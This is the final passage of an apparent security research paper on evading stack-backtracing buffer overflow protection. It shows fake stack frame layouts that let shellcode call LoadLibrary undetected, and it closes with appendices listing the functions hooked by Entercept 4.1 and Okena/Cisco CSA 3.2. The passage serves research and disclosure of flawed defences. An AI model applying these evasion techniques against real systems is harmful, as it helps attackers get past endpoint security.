||
|
Once again, the buffer overflow protection code executes before
|
||
|
LoadLibrary gets to run. This time though, the stack is setup with a
|
||
|
return address pointing to a non-writable memory segment. In addition,
|
||
|
the ebp register is not present on stack thus the protection code cannot
|
||
|
perform stack backtracing and determine that the return address in the
|
||
|
next stack frame points to a writable segment. This allows the shellcode
|
||
|
to call LoadLibrary which returns to the "ret" instruction. In its turn,
|
||
|
the "ret" instruction pops the next return address off stack
|
||
|
(return_eip) and transfers control to it.
|
||
|
|
||
|
|
||
|
|------------------------------|
|
||
|
| return address (return_eip) |
|
||
|
|------------------------------|
|
||
|
| address of "kernel32.dll" str|
|
||
|
|------------------------------|
|
||
|
| address of "ret" instruction |
|
||
|
|------------------------------|
|
||
|
|
||
|
|
||
|
In addition, any number of arbitrary complex fake stack frames can be
|
||
|
setup to further confuse the protection code.
|
||
|
|
||
|
Here is an example of a fake frame that uses a "ret 8" instruction
|
||
|
instead of simple "ret":
|
||
|
|
||
|
|
||
|
|--------------------------------|
|
||
|
| return address |
|
||
|
|--------------------------------|
|
||
|
| address of "ret" instruction | <- fake frame 2
|
||
|
|--------------------------------|
|
||
|
| any value |
|
||
|
|--------------------------------|
|
||
|
| address of "kernel32.dll" str |
|
||
|
|--------------------------------|
|
||
|
| address of "ret 8" instruction | <- fake frame 1
|
||
|
|--------------------------------|
|
||
|
|
||
|
|
||
|
This causes an extra 32-bit value to be removed from stack, complicating
|
||
|
any kind of analysis even further.
|
||
|
|
||
|
|
||
|
--[ 5 - Conclusions
|
||
|
|
||
|
The majority of commercial security systems do not actually prevent
|
||
|
buffer overflows but rather detect the execution of shellcode. The most
|
||
|
common technology used to detect shellcode is code page permission
|
||
|
checking which relies on stack backtracing.
|
||
|
|
||
|
Stack backtracing involves traversing stack frames and verifying that
|
||
|
the return addresses do not originate from writable memory segments such
|
||
|
as stack or heap areas.
|
||
|
|
||
|
The paper presents a number of different ways to bypass both userland
|
||
|
and kernel based stack backtracing. These range from tampering with
|
||
|
function preambles to creating fake stack frames.
|
||
|
|
||
|
In conclusion, the majority of current buffer overflow protection
|
||
|
implementations are flawed, providing a false sense of security and
|
||
|
little real protection against determined attackers.
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
Appendix A: Entercept 4.1 Hooks
|
||
|
|
||
|
|
||
|
Entercept hooks a number of functions in userland and in the kernel. Here
|
||
|
is a list of the currently hooked functions as of Entercept 4.1.
|
||
|
|
||
|
User Land
|
||
|
msvcrt.dll
|
||
|
_creat
|
||
|
_read
|
||
|
_write
|
||
|
system
|
||
|
kernel32.dll
|
||
|
CreatePipe
|
||
|
CreateProcessA
|
||
|
GetProcAddress
|
||
|
GetStartupInfoA
|
||
|
LoadLibraryA
|
||
|
PeekNamedPipe
|
||
|
ReadFile
|
||
|
VirtualProtect
|
||
|
VirtualProtectEx
|
||
|
WinExec
|
||
|
WriteFile
|
||
|
advapi32.dll
|
||
|
RegOpenKeyA
|
||
|
rpcrt4.dll
|
||
|
NdrServerInitializeMarshall
|
||
|
user32.dll
|
||
|
ExitWindowsEx
|
||
|
ws2_32.dll
|
||
|
WPUCompleteOverlappedRequest
|
||
|
WSAAddressToStringA
|
||
|
WSACancelAsyncRequest
|
||
|
WSACloseEvent
|
||
|
WSAConnect
|
||
|
WSACreateEvent
|
||
|
WSADuplicateSocketA
|
||
|
WSAEnumNetworkEvents
|
||
|
WSAEventSelect
|
||
|
WSAGetServiceClassInfoA
|
||
|
WSCInstallNameSpace
|
||
|
wininet.dll
|
||
|
InternetSecurityProtocolToStringW
|
||
|
InternetSetCookieA
|
||
|
InternetSetOptionExA
|
||
|
lsasrv.dll
|
||
|
LsarLookupNames
|
||
|
LsarLookupSids2
|
||
|
msv1_0.dll
|
||
|
Msv1_0ExportSubAuthenticationRoutine
|
||
|
Msv1_0SubAuthenticationPresent
|
||
|
|
||
|
Kernel
|
||
|
NtConnectPort
|
||
|
NtCreateProcess
|
||
|
NtCreateThread
|
||
|
NtCreateToken
|
||
|
NtCreateKey
|
||
|
NtDeleteKey
|
||
|
NtDeleteValueKey
|
||
|
NtEnumerateKey
|
||
|
NtEnumerateValueKey
|
||
|
NtLoadKey
|
||
|
NtLoadKey2
|
||
|
NtQueryKey
|
||
|
NtQueryMultipleValueKey
|
||
|
NtQueryValueKey
|
||
|
NtReplaceKey
|
||
|
NtRestoreKey
|
||
|
NtSetValueKey
|
||
|
NtMakeTemporaryObject
|
||
|
NtSetContextThread
|
||
|
NtSetInformationProcess
|
||
|
NtSetSecurityObject
|
||
|
NtTerminateProcess
|
||
|
|
||
|
|
||
|
|
||
|
Appendix B: Okena/Cisco CSA 3.2 Hooks
|
||
|
|
||
|
|
||
|
Okena/CSA hooks many functions in userland but many less in the kernel.
|
||
|
A lot of the userland hooks are the same ones that Entercept hooks.
|
||
|
However, almost all of the functions Okena/CSA hooks in the kernel are
|
||
|
related to altering keys in the Windows registry. Okena/CSA does not
|
||
|
seem as concerned as Entercept about backtracing calls in the kernel.
|
||
|
This leads to an interesting vulnerability, left as an exercise to the
|
||
|
reader.
|
||
|
|
||
|
User Land
|
||
|
kernel32.dll
|
||
|
CreateProcessA
|
||
|
CreateProcessW
|
||
|
CreateRemoteThread
|
||
|
CreateThread
|
||
|
FreeLibrary
|
||
|
LoadLibraryA
|
||
|
LoadLibraryExA
|
||
|
LoadLibraryExW
|
||
|
LoadLibraryW
|
||
|
LoadModule
|
||
|
OpenProcess
|
||
|
VirtualProtect
|
||
|
VirtualProtectEx
|
||
|
WinExec
|
||
|
WriteProcessMemory
|
||
|
ole32.dll
|
||
|
CoFileTimeToDosDateTime
|
||
|
CoGetMalloc
|
||
|
CoGetStandardMarshal
|
||
|
CoGetState
|
||
|
CoResumeClassObjects
|
||
|
CreateObjrefMoniker
|
||
|
CreateStreamOnHGlobal
|
||
|
DllGetClassObject
|
||
|
StgSetTimes
|
||
|
StringFromCLSID
|
||
|
oleaut32.dll
|
||
|
LPSAFEARRAY_UserUnmarshal
|
||
|
urlmon.dll
|
||
|
CoInstall
|
||
|
|
||
|
Kernel
|
||
|
NtCreateKey
|
||
|
NtOpenKey
|
||
|
NtDeleteKey
|
||
|
NtDeleteValueKey
|
||
|
NtSetValueKey
|
||
|
NtOpenProcess
|
||
|
NtWriteVirtualMemory
|
||
|
|
||
|
|
||
|
|=[ EOF ]=---------------------------------------------------------------=|
|
||
|
|